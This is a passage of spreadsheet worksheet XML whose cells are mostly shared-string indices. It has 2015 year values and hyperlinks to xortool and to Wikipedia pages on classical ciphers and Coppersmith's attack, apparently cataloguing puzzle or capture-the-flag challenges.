      <c r="F118" s="44" t="s">
        <v>1483</v>
      </c>
      <c r="G118" s="102"/>
      <c r="H118" s="105"/>
      <c r="I118" s="105"/>
      <c r="J118" s="105"/>
      <c r="K118" s="105"/>
      <c r="L118" s="105"/>
      <c r="M118" s="105"/>
      <c r="N118" s="105"/>
      <c r="O118" s="105"/>
      <c r="P118" s="105"/>
      <c r="Q118" s="105"/>
      <c r="R118" s="105"/>
      <c r="S118" s="105"/>
      <c r="T118" s="105"/>
      <c r="U118" s="105"/>
      <c r="V118" s="105"/>
      <c r="W118" s="105"/>
      <c r="X118" s="105"/>
      <c r="Y118" s="105"/>
      <c r="Z118" s="105"/>
    </row>
    <row r="119">
      <c r="A119" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B119" s="43">
        <v>2015.0</v>
      </c>
      <c r="C119" s="5" t="s">
        <v>1516</v>
      </c>
      <c r="D119" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E119" s="5" t="s">
        <v>848</v>
      </c>
      <c r="F119" s="5" t="s">
        <v>1517</v>
      </c>
      <c r="G119" s="3"/>
    </row>
    <row r="120">
      <c r="A120" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B120" s="43">
        <v>2015.0</v>
      </c>
      <c r="C120" s="5" t="s">
        <v>1519</v>
      </c>
      <c r="D120" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E120" s="5" t="s">
        <v>1520</v>
      </c>
      <c r="F120" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G120" s="3"/>
    </row>
    <row r="121">
      <c r="A121" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B121" s="31">
        <v>2015.0</v>
      </c>
      <c r="C121" s="30" t="s">
        <v>1522</v>
      </c>
      <c r="D121" s="30" t="s">
        <v>1363</v>
      </c>
      <c r="E121" s="30" t="s">
        <v>1524</v>
      </c>
      <c r="F121" s="30" t="s">
        <v>1526</v>
      </c>
      <c r="G121" s="30" t="s">
        <v>1527</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B122" s="31">
        <v>2015.0</v>
      </c>
      <c r="C122" s="30" t="s">
        <v>1528</v>
      </c>
      <c r="D122" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E122" s="30" t="s">
        <v>1529</v>
      </c>
      <c r="F122" s="35" t="s">
        <v>1531</v>
      </c>
      <c r="G122" s="109" t="s">
        <v>1532</v>
      </c>
      <c r="H122" s="30"/>
    </row>
    <row r="123">
      <c r="A123" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B123" s="31">
        <v>2015.0</v>
      </c>
      <c r="C123" s="30" t="s">
        <v>1537</v>
      </c>
      <c r="D123" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E123" s="30" t="s">
        <v>1538</v>
      </c>
      <c r="F123" s="35" t="s">
        <v>1539</v>
      </c>
      <c r="G123" s="30"/>
    </row>
    <row r="124">
      <c r="A124" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B124" s="31">
        <v>2015.0</v>
      </c>
      <c r="C124" s="30" t="s">
        <v>1542</v>
      </c>
      <c r="D124" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E124" s="30" t="s">
        <v>1544</v>
      </c>
      <c r="F124" s="35" t="s">
        <v>1546</v>
      </c>
      <c r="G124" s="33" t="str">
        <f>HYPERLINK("https://github.com/hellman/xortool","XorTool")</f>
        <v>XorTool</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B125" s="31">
        <v>2015.0</v>
      </c>
      <c r="C125" s="30" t="s">
        <v>1550</v>
      </c>
      <c r="D125" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E125" s="30" t="s">
        <v>1088</v>
      </c>
      <c r="F125" s="30" t="s">
        <v>1551</v>
      </c>
      <c r="G125" s="30" t="s">
        <v>1552</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B126" s="31">
        <v>2015.0</v>
      </c>
      <c r="C126" s="30" t="s">
        <v>1553</v>
      </c>
      <c r="D126" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E126" s="30" t="s">
        <v>1555</v>
      </c>
      <c r="F126" s="35" t="s">
        <v>1556</v>
      </c>
      <c r="G126" s="30" t="s">
        <v>1558</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B127" s="31">
        <v>2015.0</v>
      </c>
      <c r="C127" s="30" t="s">
        <v>1560</v>
      </c>
      <c r="D127" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E127" s="30" t="s">
        <v>1561</v>
      </c>
      <c r="F127" s="35" t="s">
        <v>1562</v>
      </c>
      <c r="G127" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Pigpen_cipher","pigpen cipher")</f>
        <v>pigpen cipher</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B128" s="31">
        <v>2015.0</v>
      </c>
      <c r="C128" s="30" t="s">
        <v>1566</v>
      </c>
      <c r="D128" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E128" s="30" t="s">
        <v>1567</v>
      </c>
      <c r="F128" s="35" t="s">
        <v>1568</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B129" s="31">
        <v>2015.0</v>
      </c>
      <c r="C129" s="30" t="s">
        <v>1569</v>
      </c>
      <c r="D129" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E129" s="30" t="s">
        <v>1570</v>
      </c>
      <c r="F129" s="35" t="s">
        <v>1571</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B130" s="31">
        <v>2015.0</v>
      </c>
      <c r="C130" s="30" t="s">
        <v>1569</v>
      </c>
      <c r="D130" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E130" s="30" t="s">
        <v>1570</v>
      </c>
      <c r="F130" s="30" t="s">
        <v>1572</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B131" s="31">
        <v>2015.0</v>
      </c>
      <c r="C131" s="30" t="s">
        <v>1573</v>
      </c>
      <c r="D131" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E131" s="30" t="s">
        <v>1574</v>
      </c>
      <c r="F131" s="35" t="s">
        <v>1576</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B132" s="31">
        <v>2015.0</v>
      </c>
      <c r="C132" s="30" t="s">
        <v>924</v>
      </c>
      <c r="D132" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E132" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F132" s="30" t="s">
        <v>1579</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B133" s="31">
        <v>2015.0</v>
      </c>
      <c r="C133" s="30" t="s">
        <v>1580</v>
      </c>
      <c r="D133" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E133" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F133" s="35" t="s">
        <v>1581</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B134" s="31">
        <v>2015.0</v>
      </c>
      <c r="C134" s="30" t="s">
        <v>1583</v>
      </c>
      <c r="D134" s="35" t="s">
        <v>48</v>
      </c>
      <c r="E134" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F134" s="114" t="s">
        <v>1517</v>
      </c>
      <c r="G134" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Coppersmith%27s_attack#H.C3.A5stad.27s_Broadcast_Attack","Coppersmith's attack")</f>
        <v>Coppersmith's attack</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="17">
        <v>42542.0</v>
      </c>
      <c r="B135" s="65"/>
      <c r="C135" s="65"/>
      <c r="D135" s="65"/>
      <c r="E135" s="9"/>
      <c r="F135" s="65"/>
      <c r="G135" s="65"/>
      <c r="H135" s="66"/>
      <c r="I135" s="9"/>
      <c r="J135" s="9"/>
      <c r="K135" s="9"/>
      <c r="L135" s="9"/>
      <c r="M135" s="9"/>
      <c r="N135" s="9"/>
      <c r="O135" s="9"/>
      <c r="P135" s="9"/>
      <c r="Q135" s="9"/>
      <c r="R135" s="9"/>
      <c r="S135" s="9"/>
      <c r="T135" s="9"/>
      <c r="U135" s="9"/>
      <c r="V135" s="9"/>
      <c r="W135" s="9"/>
      <c r="X135" s="9"/>
      <c r="Y135" s="9"/>
      <c r="Z135" s="9"/>
    </row>
    <row r="136">
      <c r="A136" s="5" t="s">
        <v>1593</v>
      </c>
      <c r="B136" s="43">
        <v>2015.0</v>
      </c>
      <c r="C136" s="5" t="s">
        <v>1595</v>
      </c>
      <c r="D136" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E136" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F136" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="s">
        <v>1593</v>
      </c>
      <c r="B137" s="43">
        <v>2015.0</v>
      </c>
      <c r="C137" s="5" t="s">
        <v>1598</v>
      </c>
      <c r="D137" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E137" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F137" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="s">
        <v>1593</v>
      </c>
      <c r="B138" s="43">
        <v>2015.0</v>
      </c>
      <c r="C138" s="5" t="s">
        <v>1600</v>
      </c>
      <c r="D138" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E138" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F138" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="s">
        <v>1593</v>
      </c>
      <c r="B139" s="43">
        <v>2015.0</v>
      </c>
      <c r="C139" s="5" t="s">
        <v>1601</v>
      </c>
      <c r="D139" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E139" s="5" t="s">
        <v>1602</v>
      </c>
      <c r="F139" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="s">
        <v>1593</v>
      </c>
      <c r="B140" s="43">
        <v>2015.0</v>
      </c>
      <c r="C140" s="5" t="s">
        <v>766</v>
      </c>
      <c r="D140" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E140" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F140" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B141" s="31">
        <v>2015.0</v>
      </c>
      <c r="C141" s="30" t="s">
        <v>1603</v>
      </c>
      <c r="D141" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E141" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Affine_cipher","affine cipher")</f>
        <v>affine cipher</v>
      </c>
      <c r="F141" s="30" t="s">
        <v>1610</v>
      </c>
      <c r="G141" s="30"/>
    </row>
    <row r="142">
      <c r="A142" s="30" t="s">
        <v>976</v>
      </c>
      <c r="B142" s="31">
        <v>2015.0</v>
      </c>
      <c r="C142" s="30" t="s">
        <v>1611</v>
      </c>
      <c r="D142" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E142" s="30" t="s">
        <v>1612</v>
      </c>
      <c r="F142" s="30" t="s">
        <v>1613</v>
      </c>
      <c r="G142" s="116" t="s">
        <v>1614</v>
      </c>
      <c r="H142" s="30"/>
      <c r="I142" s="30"/>
      <c r="J142" s="30"/>
    </row>
    <row r="143">
      <c r="A143" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B143" s="31">
        <v>2015.0</v>
      </c>
      <c r="C143" s="30" t="s">
        <v>1622</v>
      </c>
      <c r="D143" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E143" s="30" t="s">
        <v>1623</v>
      </c>
      <c r="F143" s="30" t="s">
        <v>1624</v>
      </c>
      <c r="G143" s="40" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B144" s="31">
        <v>2015.0</v>
      </c>
      <c r="C144" s="30" t="s">
        <v>1625</v>
      </c>
      <c r="D144" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E144" s="117" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Grille_(cryptography)","Cardian grille ")</f>
        <v>Cardian grille </v>
      </c>
      <c r="F144" s="30" t="s">
        <v>1626</v>
      </c>
      <c r="G144" s="40" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B145" s="31">
        <v>2015.0</v>
      </c>
      <c r="C145" s="30" t="s">
        <v>1627</v>
      </c>
      <c r="D145" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E145" s="30" t="s">
        <v>1088</v>
      </c>
      <c r="F145" s="35" t="s">
        <v>1628</v>
      </c>
      <c r="G145" s="35" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B146" s="31">
        <v>2015.0</v>
      </c>
      <c r="C146" s="30" t="s">
        <v>1629</v>
      </c>
      <c r="D146" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E146" s="30" t="s">
        <v>1630</v>
      </c>
      <c r="F146" s="30" t="s">
        <v>1631</v>
      </c>
      <c r="G146" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Uniform_Resource_Identifier","Information about URI's")</f>
        <v>Information about URI's</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="30" t="s">
        <v>857</v>
      </c>
      <c r="B147" s="31">
        <v>2015.0</v>
      </c>
      <c r="C147" s="30" t="s">
        <v>1632</v>
      </c>
      <c r="D147" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E147" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F147" s="30" t="s">
        <v>1633</v>
      </c>
      <c r="G147" s="30" t="s">
        <v>1634</v>
      </c>
      <c r="H147" s="30"/>
      <c r="I147" s="30"/>
    </row>
    <row r="148">
      <c r="A148" s="17">
        <v>42545.0</v>
      </c>
      <c r="B148" s="65"/>
      <c r="C148" s="65"/>
      <c r="D148" s="65"/>
      <c r="E148" s="9"/>
      <c r="F148" s="65"/>
      <c r="G148" s="65"/>
      <c r="H148" s="66"/>
      <c r="I148" s="9"/>
      <c r="J148" s="9"/>
      <c r="K148" s="9"/>
      <c r="L148" s="9"/>
      <c r="M148" s="9"/>
      <c r="N148" s="9"/>
      <c r="O148" s="9"/>
      <c r="P148" s="9"/>
      <c r="Q148" s="9"/>
      <c r="R148" s="9"/>
      <c r="S148" s="9"/>
      <c r="T148" s="9"/>
      <c r="U148" s="9"/>
      <c r="V148" s="9"/>
      <c r="W148" s="9"/>
      <c r="X148" s="9"/>
      <c r="Y148" s="9"/>
      <c r="Z148" s="9"/>
    </row>
    <row r="149">
      <c r="A149" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B149" s="119">
        <v>2015.0</v>
      </c>
      <c r="C149" s="118" t="s">
        <v>1638</v>
      </c>
      <c r="D149" s="118" t="s">
        <v>128</v>
      </c>
      <c r="E149" s="118" t="s">
        <v>766</v>
      </c>
      <c r="F149" s="118" t="s">
        <v>682</v>
      </c>
      <c r="G149" s="120"/>
      <c r="H149" s="121"/>
      <c r="I149" s="121"/>
      <c r="J149" s="121"/>
      <c r="K149" s="121"/>
      <c r="L149" s="121"/>
      <c r="M149" s="121"/>
      <c r="N149" s="121"/>
      <c r="O149" s="121"/>
      <c r="P149" s="121"/>
      <c r="Q149" s="121"/>
      <c r="R149" s="121"/>
      <c r="S149" s="121"/>
      <c r="T149" s="121"/>
      <c r="U149" s="121"/>
      <c r="V149" s="121"/>
      <c r="W149" s="121"/>
      <c r="X149" s="121"/>
      <c r="Y149" s="121"/>
      <c r="Z149" s="121"/>
    </row>
    <row r="150">
      <c r="A150" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B150" s="119">
        <v>2015.0</v>
      </c>
      <c r="C150" s="118" t="s">
        <v>1639</v>
      </c>
      <c r="D150" s="118" t="s">
        <v>128</v>
      </c>
      <c r="E150" s="118" t="s">
        <v>1640</v>
      </c>
      <c r="F150" s="118" t="s">
        <v>1641</v>
      </c>
      <c r="G150" s="118" t="s">
        <v>1642</v>
      </c>
      <c r="H150" s="121"/>
      <c r="I150" s="121"/>
      <c r="J150" s="121"/>
      <c r="K150" s="121"/>
      <c r="L150" s="121"/>
      <c r="M150" s="121"/>
      <c r="N150" s="121"/>
      <c r="O150" s="121"/>
      <c r="P150" s="121"/>
      <c r="Q150" s="121"/>
      <c r="R150" s="121"/>
      <c r="S150" s="121"/>
      <c r="T150" s="121"/>
      <c r="U150" s="121"/>
      <c r="V150" s="121"/>
      <c r="W150" s="121"/>
      <c r="X150" s="121"/>
      <c r="Y150" s="121"/>
      <c r="Z150" s="121"/>
    </row>
    <row r="151">
      <c r="A151" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B151" s="119">
        <v>2015.0</v>
      </c>
      <c r="C151" s="118" t="s">
        <v>1643</v>
      </c>
      <c r="D151" s="118" t="s">
        <v>48</v>
      </c>
      <c r="E151" s="118" t="s">
        <v>777</v>
      </c>
      <c r="F151" s="118" t="s">
        <v>1644</v>
      </c>
      <c r="G151" s="120"/>
      <c r="H151" s="121"/>
      <c r="I151" s="121"/>
      <c r="J151" s="121"/>
      <c r="K151" s="121"/>
      <c r="L151" s="121"/>
      <c r="M151" s="121"/>
      <c r="N151" s="121"/>
      <c r="O151" s="121"/>
      <c r="P151" s="121"/>
      <c r="Q151" s="121"/>
      <c r="R151" s="121"/>
      <c r="S151" s="121"/>
      <c r="T151" s="121"/>
      <c r="U151" s="121"/>
      <c r="V151" s="121"/>
      <c r="W151" s="121"/>
      <c r="X151" s="121"/>
      <c r="Y151" s="121"/>
      <c r="Z151" s="121"/>
    </row>
    <row r="152">
      <c r="A152" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B152" s="119">
        <v>2015.0</v>
      </c>
      <c r="C152" s="118" t="s">
        <v>1645</v>
      </c>
      <c r="D152" s="118" t="s">
        <v>48</v>
      </c>
      <c r="E152" s="118" t="s">
        <v>716</v>
      </c>
      <c r="F152" s="118" t="s">
        <v>682</v>
      </c>
      <c r="G152" s="120"/>
      <c r="H152" s="121"/>
      <c r="I152" s="121"/>
      <c r="J152" s="121"/>
      <c r="K152" s="121"/>
      <c r="L152" s="121"/>
      <c r="M152" s="121"/>
      <c r="N152" s="121"/>
      <c r="O152" s="121"/>
      <c r="P152" s="121"/>
      <c r="Q152" s="121"/>
      <c r="R152" s="121"/>
      <c r="S152" s="121"/>
      <c r="T152" s="121"/>
      <c r="U152" s="121"/>
      <c r="V152" s="121"/>
      <c r="W152" s="121"/>
      <c r="X152" s="121"/>
      <c r="Y152" s="121"/>
      <c r="Z152" s="121"/>
    </row>
    <row r="153">
      <c r="A153" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B153" s="119">
        <v>2015.0</v>
      </c>
      <c r="C153" s="118" t="s">
        <v>1646</v>
      </c>
      <c r="D153" s="118" t="s">
        <v>23</v>
      </c>
      <c r="E153" s="118" t="s">
        <v>1647</v>
      </c>
      <c r="F153" s="118" t="s">
        <v>1648</v>
      </c>
      <c r="G153" s="120"/>
      <c r="H153" s="121"/>
      <c r="I153" s="121"/>
      <c r="J153" s="121"/>
      <c r="K153" s="121"/>
      <c r="L153" s="121"/>
      <c r="M153" s="121"/>
      <c r="N153" s="121"/>
      <c r="O153" s="121"/>
      <c r="P153" s="121"/>
      <c r="Q153" s="121"/>
      <c r="R153" s="121"/>
      <c r="S153" s="121"/>
      <c r="T153" s="121"/>
      <c r="U153" s="121"/>
      <c r="V153" s="121"/>
      <c r="W153" s="121"/>
      <c r="X153" s="121"/>
      <c r="Y153" s="121"/>
      <c r="Z153" s="121"/>
    </row>
    <row r="154">
      <c r="A154" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B154" s="119">
        <v>2015.0</v>
      </c>
      <c r="C154" s="118" t="s">
        <v>1649</v>
      </c>
      <c r="D154" s="118" t="s">
        <v>767</v>
      </c>
      <c r="E154" s="118" t="s">
        <v>804</v>
      </c>
      <c r="F154" s="118" t="s">
        <v>1650</v>
      </c>
      <c r="G154" s="122" t="s">
        <v>1651</v>
      </c>
      <c r="H154" s="121"/>
      <c r="I154" s="121"/>
      <c r="J154" s="121"/>
      <c r="K154" s="121"/>
      <c r="L154" s="121"/>
      <c r="M154" s="121"/>
      <c r="N154" s="121"/>
      <c r="O154" s="121"/>
      <c r="P154" s="121"/>
      <c r="Q154" s="121"/>
      <c r="R154" s="121"/>
      <c r="S154" s="121"/>
      <c r="T154" s="121"/>
      <c r="U154" s="121"/>
      <c r="V154" s="121"/>
      <c r="W154" s="121"/>
      <c r="X154" s="121"/>
      <c r="Y154" s="121"/>
      <c r="Z154" s="121"/>
    </row>
    <row r="155">
      <c r="A155" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B155" s="119">
        <v>2015.0</v>
      </c>
      <c r="C155" s="118" t="s">
        <v>1652</v>
      </c>
      <c r="D155" s="118" t="s">
        <v>128</v>
      </c>
      <c r="E155" s="118" t="s">
        <v>1653</v>
      </c>
      <c r="F155" s="118" t="s">
        <v>1654</v>
      </c>
      <c r="G155" s="118" t="s">
        <v>1655</v>
      </c>
      <c r="H155" s="121"/>
      <c r="I155" s="121"/>
      <c r="J155" s="121"/>
      <c r="K155" s="121"/>
      <c r="L155" s="121"/>
      <c r="M155" s="121"/>
      <c r="N155" s="121"/>
      <c r="O155" s="121"/>
      <c r="P155" s="121"/>
      <c r="Q155" s="121"/>
      <c r="R155" s="121"/>
      <c r="S155" s="121"/>
      <c r="T155" s="121"/>
      <c r="U155" s="121"/>
      <c r="V155" s="121"/>
      <c r="W155" s="121"/>
      <c r="X155" s="121"/>
      <c r="Y155" s="121"/>
      <c r="Z155" s="121"/>
    </row>
    <row r="156">
      <c r="A156" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B156" s="119">
        <v>2015.0</v>
      </c>
      <c r="C156" s="118" t="s">
        <v>1656</v>
      </c>
      <c r="D156" s="118" t="s">
        <v>767</v>
      </c>
      <c r="E156" s="118" t="s">
        <v>1657</v>
      </c>
      <c r="F156" s="118" t="s">
        <v>1650</v>
      </c>
      <c r="G156" s="122" t="s">
        <v>1658</v>
      </c>
      <c r="H156" s="121"/>
      <c r="I156" s="121"/>
      <c r="J156" s="121"/>
      <c r="K156" s="121"/>
      <c r="L156" s="121"/>
      <c r="M156" s="121"/>
      <c r="N156" s="121"/>
      <c r="O156" s="121"/>
      <c r="P156" s="121"/>
      <c r="Q156" s="121"/>
      <c r="R156" s="121"/>
      <c r="S156" s="121"/>
      <c r="T156" s="121"/>
      <c r="U156" s="121"/>
      <c r="V156" s="121"/>
      <c r="W156" s="121"/>
      <c r="X156" s="121"/>
      <c r="Y156" s="121"/>
      <c r="Z156" s="121"/>
    </row>
    <row r="157">
      <c r="A157" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B157" s="119">
        <v>2015.0</v>
      </c>
      <c r="C157" s="118" t="s">
        <v>1662</v>
      </c>
      <c r="D157" s="118" t="s">
        <v>128</v>
      </c>
      <c r="E157" s="118" t="s">
        <v>766</v>
      </c>
      <c r="F157" s="118" t="s">
        <v>1663</v>
      </c>
      <c r="G157" s="122" t="s">
        <v>1664</v>
      </c>
      <c r="H157" s="121"/>
      <c r="I157" s="121"/>
      <c r="J157" s="121"/>
      <c r="K157" s="121"/>
      <c r="L157" s="121"/>
      <c r="M157" s="121"/>
      <c r="N157" s="121"/>
      <c r="O157" s="121"/>
      <c r="P157" s="121"/>
      <c r="Q157" s="121"/>
      <c r="R157" s="121"/>
      <c r="S157" s="121"/>
      <c r="T157" s="121"/>
      <c r="U157" s="121"/>
      <c r="V157" s="121"/>
      <c r="W157" s="121"/>
      <c r="X157" s="121"/>
      <c r="Y157" s="121"/>
      <c r="Z157" s="121"/>
    </row>
    <row r="158">
      <c r="A158" s="118" t="s">
        <v>1040</v>
      </c>
      <c r="B158" s="119">
        <v>2015.0</v>
      </c>
      <c r="C158" s="118" t="s">
        <v>1630</v>
      </c>
      <c r="D158" s="118" t="s">
        <v>23</v>
      </c>
      <c r="E158" s="118" t="s">
        <v>1669</v>
      </c>
      <c r="F158" s="118" t="s">
        <v>1670</v>
      </c>
      <c r="G158" s="120"/>
      <c r="H158" s="121"/>
      <c r="I158" s="121"/>
      <c r="J158" s="121"/>
      <c r="K158" s="121"/>
      <c r="L158" s="121"/>
      <c r="M158" s="121"/>
      <c r="N158" s="121"/>
      <c r="O158" s="121"/>
      <c r="P158" s="121"/>
      <c r="Q158" s="121"/>
      <c r="R158" s="121"/>
      <c r="S158" s="121"/>
      <c r="T158" s="121"/>
      <c r="U158" s="121"/>
      <c r="V158" s="121"/>
      <c r="W158" s="121"/>
      <c r="X158" s="121"/>
      <c r="Y158" s="121"/>
      <c r="Z158" s="121"/>
    </row>
    <row r="159">
      <c r="A159" s="123" t="s">
        <v>1029</v>
      </c>
      <c r="B159" s="124">
        <v>2015.0</v>
      </c>
      <c r="C159" s="123" t="s">
        <v>1673</v>
      </c>
      <c r="D159" s="123" t="s">
        <v>128</v>
      </c>
      <c r="E159" s="123" t="s">
        <v>924</v>
      </c>
      <c r="F159" s="123" t="s">
        <v>1676</v>
      </c>
      <c r="G159" s="123" t="s">
        <v>903</v>
      </c>
      <c r="H159" s="125"/>
      <c r="I159" s="125"/>
      <c r="J159" s="121"/>
      <c r="K159" s="121"/>
      <c r="L159" s="121"/>
      <c r="M159" s="121"/>
      <c r="N159" s="121"/>
      <c r="O159" s="121"/>
      <c r="P159" s="121"/>
      <c r="Q159" s="121"/>
      <c r="R159" s="121"/>
      <c r="S159" s="121"/>
      <c r="T159" s="121"/>
      <c r="U159" s="121"/>
      <c r="V159" s="121"/>
      <c r="W159" s="121"/>
      <c r="X159" s="121"/>
      <c r="Y159" s="121"/>
      <c r="Z159" s="121"/>
    </row>
    <row r="160">
      <c r="A160" s="123" t="s">
        <v>1111</v>
      </c>
      <c r="B160" s="124">
        <v>2015.0</v>
      </c>
      <c r="C160" s="123" t="s">
        <v>1679</v>
      </c>
      <c r="D160" s="123" t="s">
        <v>128</v>
      </c>
      <c r="E160" s="123" t="s">
        <v>1683</v>
      </c>
      <c r="F160" s="123" t="s">
        <v>1684</v>
      </c>
      <c r="G160" s="123" t="s">
        <v>1685</v>
      </c>
      <c r="J160" s="121"/>
      <c r="K160" s="121"/>
      <c r="L160" s="121"/>
      <c r="M160" s="121"/>
      <c r="N160" s="121"/>
      <c r="O160" s="121"/>
      <c r="P160" s="121"/>
      <c r="Q160" s="121"/>
      <c r="R160" s="121"/>
      <c r="S160" s="121"/>
      <c r="T160" s="121"/>
      <c r="U160" s="121"/>
      <c r="V160" s="121"/>
      <c r="W160" s="121"/>
      <c r="X160" s="121"/>
      <c r="Y160" s="121"/>
      <c r="Z160" s="121"/>
    </row>
    <row r="161">
      <c r="A161" s="123" t="s">
        <v>1111</v>
      </c>
      <c r="B161" s="124">
        <v>2015.0</v>
      </c>
      <c r="C161" s="123" t="s">
        <v>1687</v>
      </c>
      <c r="D161" s="123" t="s">
        <v>48</v>
      </c>
      <c r="E161" s="123" t="s">
        <v>924</v>
      </c>
      <c r="F161" s="123" t="s">
        <v>1688</v>
      </c>
      <c r="I161" s="125"/>
      <c r="J161" s="121"/>
      <c r="K161" s="121"/>
      <c r="L161" s="121"/>
      <c r="M161" s="121"/>
      <c r="N161" s="121"/>
      <c r="O161" s="121"/>
      <c r="P161" s="121"/>
      <c r="Q161" s="121"/>
      <c r="R161" s="121"/>
      <c r="S161" s="121"/>
      <c r="T161" s="121"/>
      <c r="U161" s="121"/>
      <c r="V161" s="121"/>
      <c r="W161" s="121"/>
      <c r="X161" s="121"/>
      <c r="Y161" s="121"/>
      <c r="Z161" s="121"/>
    </row>
    <row r="162">
      <c r="A162" s="123" t="s">
        <v>1111</v>
      </c>
      <c r="B162" s="124">
        <v>2015.0</v>
      </c>
      <c r="C162" s="123" t="s">
        <v>1692</v>
      </c>
      <c r="D162" s="123" t="s">
        <v>23</v>
      </c>
      <c r="E162" s="123" t="s">
        <v>826</v>
      </c>
      <c r="F162" s="123" t="s">
        <v>682</v>
      </c>
      <c r="H162" s="125"/>
      <c r="I162" s="125"/>
      <c r="J162" s="121"/>
      <c r="K162" s="121"/>
      <c r="L162" s="121"/>
      <c r="M162" s="121"/>
      <c r="N162" s="121"/>
      <c r="O162" s="121"/>
      <c r="P162" s="121"/>
      <c r="Q162" s="121"/>
      <c r="R162" s="121"/>
      <c r="S162" s="121"/>
      <c r="T162" s="121"/>
      <c r="U162" s="121"/>
      <c r="V162" s="121"/>
      <c r="W162" s="121"/>
      <c r="X162" s="121"/>
      <c r="Y162" s="121"/>
      <c r="Z162" s="121"/>
    </row>
    <row r="163">
      <c r="A163" s="123" t="s">
        <v>1111</v>
      </c>
      <c r="B163" s="124">
        <v>2015.0</v>
      </c>
      <c r="C163" s="123" t="s">
        <v>1693</v>
      </c>
      <c r="D163" s="123" t="s">
        <v>23</v>
      </c>
      <c r="E163" s="123" t="s">
        <v>1694</v>
      </c>
